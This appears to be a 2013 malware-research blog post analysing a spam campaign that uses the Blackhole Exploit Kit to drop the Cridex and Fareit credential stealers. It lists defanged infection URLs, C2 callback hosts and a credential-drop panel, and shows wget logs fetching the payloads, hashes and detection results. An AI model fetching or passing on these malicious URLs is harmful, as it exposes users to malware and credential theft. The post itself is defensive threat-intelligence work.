*) This is my last post for this infection, FYI: we went far too long trying to keep things right..
Today we detected malware infection campaign created by the same bad actors we always follow. The below URL was setup for Password/Credential stealer (PWS) Trojan via spam email as per reported in fellow researcher's Mr. Conrad Longmore in "Dynamoo Blog" posts→[here] and [here]:
h00p://forumla.ru:8080/forum/links/column.php h00p://forumny.ru:8080/forum/links/column.php h00p://forum-ny.ru:8080/forum/links/column.php h00p://forum-la.ru:8080/forum/links/column.php h00p://foruminanki.ru:8080/forum/links/column.php h00p://forumilllionois.ru:8080/forum/links/column.php h00p://210.71.250.131:8080/forum/links/column.php h00p://198.104.62.49:8080/forum/links/column.php
These URL lead us to the two IP addresses serving Blackhole Exploit Kit below:
198.104.62.49 210.71.250.131
Which both IP are serving the same malware (see the snapshot below):
We are not going to include the Blackhole Exploit Analysis nor decoding here, and will focus on the analysis of the recent version credential stealer used. With noted: Our previous released guide→[here] to decode BHEK can be applied to decode all of the exploit components.
The CyberCriminal group itself is utilizing Russian-based .RU registrar called NAUNET(.RU), which nowadays quite famous for its reputation in "keep-on-allowing" registration of malicious domains in east Europe basis to aim worldwide servers as infectors and preying on American & European online banking information. The details of previous malicious domains used by this criminal group served by NAUNET can be seen in our previous post→[here].
In this variant, Trojan Win32/Cridex will make a time/delay before runs usual operation to fetch credential and communicating to motherships, and instantly shutdown after running the trojan stealer Win32/Fareit (and this time is one or two times executed..). Win32/Fareit itself will stay reside in memory until PC shutdown.Same samples in both IPs..
This is my log while fetching the first and second samples:GET /forum/links/column.php?sf=2w:1l:1l:2v:1f&he=2v:1k:1m:32:33:1k:1k:31:1j:1o&s=1k&ru=w&cz=p HTTP/1.0 Host: 198.104.62.49:8080 HTTP request sent, awaiting response... : HTTP/1.1 200 OK Server: nginx/1.0.4 Date: Tue, 05 Mar 2013 08:21:29 GMT Content-Type: application/x-msdownload Connection: keep-alive X-Powered-By: PHP/5.3.18-1~dotdeb.0 Pragma: public Expires: Tue, 05 Mar 2013 08:21:30 GMT Cache-Control: must-revalidate, post-check=0, pre-check=0 Cache-Control: private Content-Disposition: attachment; filename="about.exe" Content-Transfer-Encoding: binary Content-Length: 110592 200 OK Length: 110592 (108K) [application/x-msdownload] Saving to: `about1.exe' 2013-03-05 17:21:54 (47.6 KB/s) - `about1.exe' saved [110592/110592]andGET /forum/links/column.php?of=1o:1h:32:1l:1j&me=2v:1k:1m:32:33:1k:1k:31:1j:1o&n=1k&qo=q&yy=b HTTP/1.0 Host: 210.71.250.131:8080 HTTP request sent, awaiting response... : HTTP/1.1 200 OK Server: nginx/1.0.10 Date: Tue, 05 Mar 2013 08:32:02 GMT Content-Type: application/x-msdownload Connection: keep-alive X-Powered-By: PHP/5.3.18-1~dotdeb.0 Pragma: public Expires: Tue, 05 Mar 2013 08:32:20 GMT Cache-Control: must-revalidate, post-check=0, pre-check=0 Cache-Control: private Content-Disposition: attachment; filename="about.exe" Content-Transfer-Encoding: binary Content-Length: 110592 200 OK Length: 110592 (108K) [application/x-msdownload] Saving to: `about2.exe' 2013-03-05 17:32:43 (109 KB/s) - `about2.exe' saved [110592/110592]Compare result of the binaries:2013/03/05 17:21 110,592 about1.exe 612b6e43fd5e5933ea072d5df501790a 2013/03/05 17:32 110,592 about2.exe 612b6e43fd5e5933ea072d5df501790aThe samples looks like this..
Picture snapshot:Which is having the below binary information:
Entry Point at 0x15d1 Virtual Address is 0x4015d1 Compile Time: 0x42973D89 [Fri May 27 15:32:25 2005 UTC] / 2005-05-28 00:32:25 CRC checks: Looks fine! Sections: .text 0x1000 0x15c14 90112 .data 0x17000 0x100370 4096 .rsrc 0x118000 0x2408 12288 Hex first block snips.. 0000 4D 5A 90 00 03 00 00 00 04 00 00 00 FF FF 00 00 MZ.............. 0010 B8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 ........@....... 0020 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 0030 00 00 00 00 00 00 00 00 00 00 00 00 E0 00 00 00 ................ 0040 0E 1F BA 0E 00 B4 09 CD 21 B8 01 4C CD 21 54 68 ........!..L.!Th 0050 69 73 20 70 72 6F 67 72 61 6D 20 63 61 6E 6E 6F is program canno 0060 74 20 62 65 20 72 75 6E 20 69 6E 20 44 4F 53 20 t be run in DOS 0070 6D 6F 64 65 2E 0D 0D 0A 24 00 00 00 00 00 00 00 mode....$....... 0080 31 90 0E 35 75 F1 60 66 75 F1 60 66 75 F1 60 66 1..5u.`fu.`fu.`f 0090 52 37 0D 66 76 F1 60 66 52 37 1D 66 67 F1 60 66 R7.fv.`fR7.fg.`f 00A0 52 37 11 66 8B F1 60 66 52 37 1C 66 74 F1 60 66 R7.f..`fR7.ft.`f 00B0 52 37 18 66 74 F1 60 66 52 69 63 68 75 F1 60 66 R7.ft.`fRichu.`f 00C0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 00D0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 00E0 50 45 00 00 4C 01 03 00 89 3D 97 42 00 00 00 00 PE..L....=.B....As per picture showed, it tried to fake Microsoft application:LegalCopyright: \xa9 Microsoft Corporation. All rights reserved. InternalName: rigpsnap.dll FileVersion: 6.0.6000.16386 (vista_rtm.061101-2205) CompanyName: Microsoft Corporation ProductName: Microsoft\xae Windows\xae Operating System ProductVersion: 6.0.6000.16386 FileDescription: Remote Installation Service Policy Snap-in OriginalFilename: rigpsnap.dllInfection Summary
Malware runs CMD to move original location & delete initial trace:While the Cridex trojan is saved to %AppData%\KB********.exe
Cridex will be run by injected in memory then dropped a Trojan Fareit stealer in %Temp%\exp2.tmp.exe:
During Cridex runs it will download configuration data to be saved in registry key as binary:
We must view it in ASCII to see what it is.. as per below snapshot..
To be loaded & processedin memory as per snapshot (Cridex parts)
For Trojan Fareit part, this variant is NOT using the config:
But using the original stealer scheme planted in its binary..
The autorun in registry was set in the usual place:
HKU\..\Software\Microsoft\Windows\CurrentVersion\Run\KB00777165.exe: ""C:\Documents and Settings\rik\Application Data\KB00777165.exe""
Which IP are they use as callbacks this time?
Cridex used:h00p://209.17.186.246:8080 h00p://203.171.234.53:8080 h00p://64.85.53.168:8080 h00p://161.246.35.117:8080 h00p://202.29.5.195:8080 h00p://213.214.74.5:8080 h00p://174.121.67.199:8080 h00p://174.143.234.138:8080 h00p://18.79.3.253:8080 h00p://141.219.153.206:8080 h00p://72.251.206.90:8080 h00p://149.156.96.9:8080 h00p://212.68.63.82:8080 h00p://88.119.156.20:8080 h00p://91.199.155.222:8080 h00p://194.249.217.8:8080 h00p://109.168.106.162:8080 h00p://85.214.143.90:8080 h00p://195.191.22.97:8080 h00p://188.138.96.241:8080 h00p://31.3.103.101:8080 h00p://213.251.164.83:8080 h00p://82.100.228.130:8080 h00p://194.97.99.120:8080 h00p://78.47.153.131:8080...with the url:
/N5nmLCAAA(random)/LxcqKAA(random)/GLkOVCAAAA(random)/ HTTP/1.1
With the HTTP header like below:
POST /N5nmLCAAA/LxcqKAA/GLkOVCAAAA/ HTTP/1.1 Accept: */* User-Agent: Mozilla/5.0 (Windows; U; MSIE 7.0; Windows NT 6.0; en-US) Host: x.x.x.x:8080 Content-Length: %n Connection: Keep-Alive Cache-Control: no-cache
Fareit used callbacks to below hosts/URL (HTTP/1.0)
h00p://203.114.112.156:8080/asp/intro.php h00p://42.121.116.38:8080/asp/intro.php h00p://203.146.208.180:8080/asp/intro.php h00p://110.164.58.250:8080/asp/intro.php h00p://85.25.147.73:8080/asp/intro.php h00p://208.87.243.130:8080/asp/intro.php h00p://202.164.211.51:8080/asp/intro.php h00p://111.68.142.223:8080/asp/intro.php h00p://203.172.252.26:8080/asp/intro.php h00p://195.24.205.188:8080/asp/intro.phpWith the HTTP header like below:
POST %s HTTP/1.0
Host: %s
Accept: */*
Accept-Encoding: identity, *;q=0
Content-Length: %lu
Connection: close
Content-Type: application/octet-stream
Content-Encoding: binary
User-Agent: Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)
Content-Length:
Location:
HWID
{%08X-%04X-%04X-%02X%02X-%02X%02X%02X%02X%02X%02X}
Phished credentials are sent to 37.139.47.124:
var adminPanelLocation = 'h00p://37.139.47.124/_CRE_/'; [CDATA[h00p://37.139.47.124/_CP_/cp_a.php?h=8 h00p://37.139.47.124/_CRE_/gate.php?done=1&bid=%USER%-1379CF37C25_9455E50D0B2D20CB&info=[random] h00p://37.139.47.124/_CRE_/gate.php?bid=%USER%-1379CF37C25_9455E50D0B2D20CB&location=[random]
Hey hold on, what's the evidence?
(Click the number to download the materials below) For the callbacks I recorded below set of PCAPs:#MalwareMustDie! The NPO.[1] First infection [2] Re-producing the first session infection (different env) [3] Trojan Win32/Cridex traffic captured over interval [4] Trojan Win32/Fareit traffic captured over intervalFor the registry record: For the process runtime record: Stolen Credential Information:Here's the config file with the beautified format -->>[HERE] The Trojan Win32/Fareit grabbed credential list -->>[HERE]In Virus Total
I really took time in analysing & writing this report, yet there are so many details I cannot expose for the security purpose. I hope VT has the good detection now: Trojan Win32/Cridex - VT URL -->>[HERE]SHA1: 531923a72560d723ed764bf3618633dc541b56f9 MD5: 612b6e43fd5e5933ea072d5df501790a File size: 108.0 KB ( 110592 bytes ) File name: rigpsnap.dll File type: Win32 EXE Tags: peexe Detection ratio: 17 / 46 Analysis date: 2013-03-05 13:58:09 UTC ( 3 minutes ago ) File ./about.exe with MD5 612b6e43fd5e5933ea072d5df501790a ---------------------------------------------------------- DrWeb : Trojan.Necurs.97 VIPRE : Win32.Malware!Drop Symantec : WS.Reputation.1 TrendMicro : WORM_CRIDEX.UWA ESET-NOD32 : a variant of Win32/Kryptik.AVXR Fortinet : W32/Kryptik.ALRY!tr TrendMicro-HouseCall : WORM_CRIDEX.UWA Sophos : Mal/Generic-S Ikarus : Trojan.Win32.Bublik Kaspersky : Trojan.Win32.Bublik.ahqz PCTools : Suspicious.Cloud.7.L Malwarebytes : Trojan.FakeMS Panda : Trj/dtcontx.C Kingsoft : Win32.Troj.Bublik.ah.(kcloud) AntiVir : TR/Bublik.ahqz Emsisoft : Trojan.Win32.Bublik.ahqz.AMN (A) Comodo : TrojWare.Win32.Trojan.Agent.GenTrojan Stealer Win32/Fareit - VT URL -->>[HERE]SHA1: f994fbf2663ef2b9b0347f42e057bd03ed0dcefe MD5: a25bb86368cf2e62de4f8f25b8e0824a File size: 104.0 KB ( 106496 bytes ) File name: rigpsnap.dll File type: Win32 EXE Tags: peexe Detection ratio: 7 / 46 Analysis date: 2013-03-05 13:58:42 UTC ( 4 minutes ago ) File ./exp2.tmp.exe with MD5 a25bb86368cf2e62de4f8f25b8e0824a ------------------------------------------------------------- Symantec : WS.Reputation.1 ESET-NOD32 : a variant of Win32/Kryptik.AVXR TrendMicro-HouseCall : TROJ_GEN.F47V0305 Kaspersky : Trojan-PSW.Win32.Tepfer.groi PCTools : Suspicious.Cloud.7.L Malwarebytes : Trojan.FakeMS Fortinet : W32/Kryptik.ALRY!trSamples
For the research & raising detection ratio purpose we are sharing the analyzed samples:Download here -->>[HERE]
Additional Section
*) This section is to be added with additional information periodically. The below new detection also noted: ・This cridex variant was detecting whether the infected PC is 64bit or not.. ・Many new additionals cookies & etc function in the config file.. ・For the NAUNET Registrar relation PoC to these domains is here -->>[HERE] ・Until now, we analyzed 25 times for this cybercrime group, 1 dir = 1 analysis↓
